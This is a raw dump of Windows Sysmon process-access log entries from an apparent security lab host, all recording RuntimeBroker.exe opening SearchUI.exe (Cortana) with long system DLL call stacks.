13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405456C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406028C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000012650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406028C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 